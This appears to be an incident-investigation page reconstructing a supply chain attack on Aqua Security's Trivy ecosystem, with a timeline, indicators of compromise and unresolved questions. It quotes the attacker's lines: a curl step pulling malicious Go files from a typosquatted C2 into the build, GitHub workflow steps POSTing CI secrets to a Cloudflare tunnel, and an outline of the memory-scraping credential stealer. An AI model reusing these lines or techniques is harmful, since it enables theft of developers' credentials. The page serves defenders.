Active Investigation

Trivy Supply Chain Compromise

A coordinated attack targeting Aqua Security's Trivy ecosystem, building on the incident from early March.

Phase 01

Initial Compromise

v0.69.4 tag pushed -> references imposter commits (trivy, actions/checkout) → C2 fetch (scan.aquasecurtiy.org / 45.148.10.212) → cred stealer in built artifacts

Malicious Commit Exfiltration

Imposter Commit to actions/checkout

Attacker creates a malicious commit impersonating rauchg (Guillermo Rauch) in the actions/checkout repository. Payload fetches malicious Go files from typosquatted C2 and injects them into the build.

GitHub Commit View on GitHub ↗

70379aad actions/checkout

Impersonated author: Guillermo Rauch <rauchg@gmail.com>
Spoofed date: 2026-01-09T07:42:00Z
Message: "Fix tag handling: preserve annotations and explicit fetch-tags (#2356)"

# Payload fetches malicious Go from typosquatted C2
# scan.aquasecurtiy.org → 45.148.10.212 (TECHOFF SRV LIMITED, Amsterdam)
BASE="https://scan.aquasecurtiy.org/static"
curl -sf "$BASE/main.go" -o cmd/trivy/main.go
curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go
curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go
curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go
curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml
                  

Show evidence

Malicious Commit Persistence

Imposter Commit to aquasecurity/trivy

Attacker duplicates a prior legitimate contribution and impersonates DmitriyLewen. This malicious commit references the imposter checkout action, establishing the attack chain.

GitHub Commit View on GitHub ↗

1885610c aquasecurity/trivy

Impersonated author: DmitriyLewen <91113035+DmitriyLewen@users.noreply.github.com>
Spoofed date: 2026-03-04T10:13:53Z
Message: "fix(ci): Use correct checkout pinning"

Show evidence

Tag Push Release

17:43:37 UTC

Malicious v0.69.4 Tag Pushed

Tag v0.69.4 pushed to trivy repository, pointing to the malicious commit. This triggers automated release workflows.

Git Tag

v0.69.4 aquasecurity/trivy

Triggers release workflow (now deleted) and other CI automations

Show evidence

Distribution Supply Chain

Malicious Releases Distributed

Automated workflows publish the malicious v0.69.4 release to multiple distribution channels, maximizing supply chain impact.

Distribution Channels

Affected distribution channels:

1. GitHub Releases
• trivy v0.69.4 release page with malicious binaries

2. Container Registries
• public.ecr.aws/aquasecurity/trivy:0.69.4
• docker.io/aquasec/trivy:0.69.4
• ghcr.io/aquasecurity/trivy:0.69.4

3. Homebrew
• Not impacted (builds from source)
• Formula revoked v0.69.4 as precautionary measure

Removed by Aqua at 21:36 UTC (Mar 19)

Show evidence

Phase 02

Lateral Movement via compromised aqua-bot identity

aqua-bot compromised → malicious workflows steal creds (tfsec, trivy-action, traceeshark) → trivy-action + setup-trivy tags pointed to malicious versions

Workflow Injection Secret Dump

21:31:23 UTC

tfsec Workflow Compromised

Malicious workflow added to aquasecurity/tfsec using compromised aqua-bot identity. Workflow dumps secrets, then is reverted.

Workflow

a67fd5b5b119 aquasecurity/tfsec

View commit (aqua-bot) ↗

# Exfil via Cloudflare Tunnel
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{twitter_consumer_key, twitter_access_token, twitter_consumer_secret,
          twitter_access_token_secret, gpg_private_key, gpg_passphrase,
          dockerhub_user, dockerhub_token, github_token, slack_webhook}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

View workflow run (SCP failed) ↗

Show evidence

Workflow Injection Secret Dump

21:35:34 UTC

traceeshark Workflow Compromised

Same attack pattern applied to aquasecurity/traceeshark. Malicious workflow injected via compromised bot account.

Workflow

56591dfe113b aquasecurity/traceeshark

View commit (aqua-bot) ↗

# Exfil via Cloudflare Tunnel (GITHUB_TOKEN only)
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{github_token}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

Show evidence

Workflow Injection Secret Dump

21:36:28 UTC

trivy-action Workflow Compromised

Attack continues to aquasecurity/trivy-action. This repository is particularly critical as it's used by thousands of downstream projects.

Workflow

93ed4111101 aquasecurity/trivy-action

View commit (aqua-bot) ↗

High-impact target: GitHub Action used by thousands of CI/CD pipelines

# Exfil via Cloudflare Tunnel (GITHUB_TOKEN only)
- name: Github security scan
  run: |
    curl -X POST "https://plug-tab-protective-relay.trycloudflare.com/exfil" \
      -d "{github_token}"

# SCP step (failed - no HOST_PROD/USER_PROD/PASS_PROD secrets)
- name: copy file via scp
  uses: appleboy/scp-action@master
                  

Show evidence

Phase 03

Malicious Distribution

Tag Manipulation Supply Chain

22:08 UTC

Malicious Action Tags Published

Using compromised aqua-bot credentials, attacker publishes malicious tags for trivy-action and setup-trivy, potentially affecting all downstream users.

Supply Chain Impact

Affected actions:
• aquasecurity/trivy-action
• aquasecurity/setup-trivy

Any workflow using these actions without SHA pinning may have executed malicious code.

Note: Poisoned tags received GitHub's "Immutable" badge — malicious commits were unsigned (originals were GPG-signed).

Payload Analysis Socket.dev ↗

Three-stage payload:

1. Collect — Dump Runner.Worker process memory via /proc/<pid>/mem, grep for {"value":"<secret>","isSecret":true} pattern. Harvest SSH keys, cloud creds (AWS/GCP/Azure), k8s tokens, crypto wallets.

2. Encrypt — AES-256-CBC + RSA-4096 hybrid encryption, bundle as tpcp.tar.gz

3. Exfiltrate — POST to typosquat scan[.]aquasecurtiy[.]org. Fallback: create tpcp-docs repo on victim's GitHub, upload as release asset.

Show evidence

Phase 04

Obfuscation coordinated spam flood

Spam Flood 96 Accounts

00:08:33 - 00:09:00 UTC (Mar 20)

Discussion #10420 Flooded

96 spam accounts posted generic praise comments within ~30 seconds, drowning technical discussion and incident coordination. Includes troll comments referencing "sugma" and "ligma".

GitHub Discussion View discussion ↗

Sample accounts (96 total):

praiitt, Hancie123, rivadaviaPlataformas, aalkhraissi, vikashmedicheck, thealphadev01, mildlyinfuriating514, ssynerg, kronmetrics, jorgePanitaDev, Ethan-0218, DeployStarshipMatt, bercanozcan, E-jewelry, Christopher933, epiktechnocravers, NomadNiko, Vanshh20, GeorgiMY, durmanko, putra-0, shanefleet, sayush-nelka, YogeshwarInnovationEcoSolutions, kelvinelove, tinkatinka, phucnhkimei, YeaminRaat, mike2505, Vlasuz, bo7, PeterNHub, 18pixels, BMAAustralia, ADRIANO125, abarriostoros, nvdstore, simar525, prajeshmadhavi, anket-troi, pavlevlajic, lazyatra, aamitn, DmitriyG228, sanchir2011, NTAravind, Rishabhamogh, jk-sumit-kumar, pksurya, pankajthoughtwin, harshjf, techlead-shootorder, cmlibra71, pankaj-kaule, devslocalsig, moeedbhatti77, clubee-machine-user, DouglasGuiduce, Youssef6022, gbnijnugyf, Aznair25, teknomaintsistemi, TheoCanonne, usmanialiq, mmdGhanbari, kkgkaundal, potatomask, infogelisimsoft, AsadAbdullahAAM, Stoii2002, JaewhangShin, bothap, davidgutierrezalkostomax, Duplex19, mahesh-sini, mj6uc, kashif-dot, PAWAN1SINGH, siscontri-dev, PasovitTechnologies, husitawi, realmankwon, iacoshoria, programonaut, farrukhan11, riverLethe, ftfuture, arshad-wbst, Balerionth, desirit, ThibaultEcta, nathandentzau, Eacaw, sahil-bibox, ascorptech, natenaelme, himelali

Show evidence

Thread 01

How did they gain access to push the malicious v0.69.4 tag?

The attacker was able to push a tag to aquasecurity/trivy pointing to a malicious commit. This requires write access to the repository. Was this via a compromised PAT, GitHub App, or deploy key? The initial access vector remains unclear.

Unresolved

Thread 02

Was aqua-bot the initial access vector, or only compromised via /trivy?

The aqua-bot service account was used for lateral movement to tfsec, traceeshark, and trivy-action. However, it's unclear whether aqua-bot credentials were the initial compromise, or if they were harvested from the trivy repository's secrets after the v0.69.4 tag push triggered workflows.

Unresolved

Thread 03

What was the v0.70.0 trivy attacker tag?

At 17:51:17 UTC on March 19, a v0.70.0 tag was deleted. The commit (9dbb34d3ec0f) was authored by aqua-bot on March 16 — 3 days earlier — with message "Updates", modifying cmd/trivy/main.go, pkg/github/auth.go, pkg/github/repowrite.go, pkg/github/runner.go. This suggests aqua-bot compromise may predate March 19.

View commit (via Adnan Khan) ↗

Unresolved

Thread 04

What was the setup-trivy@v0.2.5 poisoning?

Commit 8afa9b9f was pushed to aquasecurity/setup-trivy, spoofing contributor "thara" (Tomochika Hara). Message: "Pin Trivy install script checkout to a specific commit (#28)". Spoofed date: 2026-01-15 (actual push time unknown).

Malicious commit ↗ Victim example (grafana) ↗

Unresolved

Thread 05

Is DarkSeek3r related?

A GitHub user "DarkSeek3r" (now deleted, user ID 266895321) was created at 2026-03-10T01:44:23. Their only public activity before account deletion was forking aquasecurity/trivy and actions/checkout — the exact repositories used in this attack.

View Gist (bored-engineer) ↗

Unresolved

Network Infrastructure

C2 Domains & IPs

# Primary C2 (typosquat)
scan.aquasecurtiy.org
45.148.10.212 (TECHOFF SRV LIMITED, Amsterdam, NL)

# Secondary C2 (Cloudflare Tunnel)
plug-tab-protective-relay.trycloudflare.com

# Fallback C2 (ICP hosted) - currently RickRoll, actor can update
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
          

Malicious Commits

Imposter & Injected Commits

# Imposter commits (spoofed identities)
70379aad1a8b40919ce8b382d3cd7d0315cde1d0 actions/checkout (impersonating rauchg)
1885610c6a34811c8296416ae69f568002ef11ec aquasecurity/trivy (impersonating DmitriyLewen)

# Lateral movement commits (via aqua-bot)
a67fd5b5b119 aquasecurity/tfsec
56591dfe113b aquasecurity/traceeshark
93ed41111017c3767fafc7d9cc8711f3be1a661f aquasecurity/trivy-action

# setup-trivy poisoning (January 2026, spoofing thara)
8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 aquasecurity/setup-trivy
          

Compromised Accounts

GitHub Accounts

# Compromised service account
aqua-bot (ID: 54269356, created 2019-08-19)

# Suspected attacker accounts (deleted/banned)
DarkSeek3r (ID: 266895321, created 2026-03-10T01:44:23)
          

Affected Artifacts

Poisoned Releases & Images

# Trivy v0.69.4 (removed)
ghcr.io/aquasecurity/trivy:0.69.4
docker.io/aquasec/trivy:0.69.4
public.ecr.aws/aquasecurity/trivy:0.69.4

# setup-trivy (removed)
aquasecurity/setup-trivy@v0.2.5

# trivy-action (75 of 76 tags compromised)
# Never compromised: 0.35.0 and 57a97c7e7821a5776cebc9bb87c984fa69cba8f1
# Maintainers removed all compromised tags and re-tagged clean releases
# with a v prefix (e.g., v0.35.0 instead of 0.35.0)
          

Malware Signatures

Strings & Filenames

# Attribution strings
"TeamPCP Cloud stealer"
"tpcp.tar.gz" (exfil bundle)
"tpcp-docs" (fallback exfil repo / GitHub dead drop)

# Credential sweeper targets 50+ sensitive file paths

# Injected files (from C2)
cmd/trivy/main.go
cmd/trivy/scand.go
cmd/trivy/fork_unix.go
cmd/trivy/fork_windows.go
.golangci.yaml

# Target process
"Runner.Worker" (memory scraping target)
          

Threat Actor

TeamPCP

Also known as PCPcat, ShellForce, and DeadCatx3. Emerged as a significant threat to cloud-native infrastructure in late 2025.

Self-attribution string "TeamPCP Cloud stealer" found in the trivy-action payload links this incident to the group.

View on Wiz Threat Center ↗

Targets

Cloud-Native Infrastructure

Docker APIs
Kubernetes clusters
GitHub Actions runners
Ray dashboards
Redis servers
CI/CD pipelines
          

TTPs

Common Techniques

# Initial Access
Supply chain poisoning (GitHub Actions, package registries)
Exposed service exploitation (Docker, K8s, Redis)

# Credential Harvesting
/proc/[pid]/mem memory scraping
Filesystem credential sweeping (50+ paths)
Cloud metadata service (IMDS) theft

# Exfiltration
Typosquatted domains
Cloudflare Tunnels (ephemeral C2)
GitHub dead drops (tpcp-docs repos)
ICP-hosted fallback infrastructure

# Objectives
Credential theft → lateral movement
Ransomware deployment
Cryptomining
Extortion
          

Source

Trivy Supply Chain Compromise

Initial Compromise

Imposter Commit to actions/checkout

Imposter Commit to aquasecurity/trivy

Malicious v0.69.4 Tag Pushed

Malicious Releases Distributed

Lateral Movement via compromised aqua-bot identity

tfsec Workflow Compromised

traceeshark Workflow Compromised

trivy-action Workflow Compromised

Malicious Distribution

Malicious Action Tags Published

Obfuscation coordinated spam flood

Discussion #10420 Flooded

How did they gain access to push the malicious v0.69.4 tag?

Was aqua-bot the initial access vector, or only compromised via /trivy?

What was the v0.70.0 trivy attacker tag?

What was the setup-trivy@v0.2.5 poisoning?

Is DarkSeek3r related?

C2 Domains & IPs

Imposter & Injected Commits

GitHub Accounts

Poisoned Releases & Images

Strings & Filenames

TeamPCP

Cloud-Native Infrastructure

Common Techniques

Flare.io Analysis

20 Days Later: Trivy Compromise Act II

Trivy Under Attack Again: GitHub Actions Compromise

Trivy Compromised a Second Time - Malicious v0.69.4 Release

aquasecurity/trivy

Trivy GitHub Actions Compromise

TeamPCP Cloud-Native Ransomware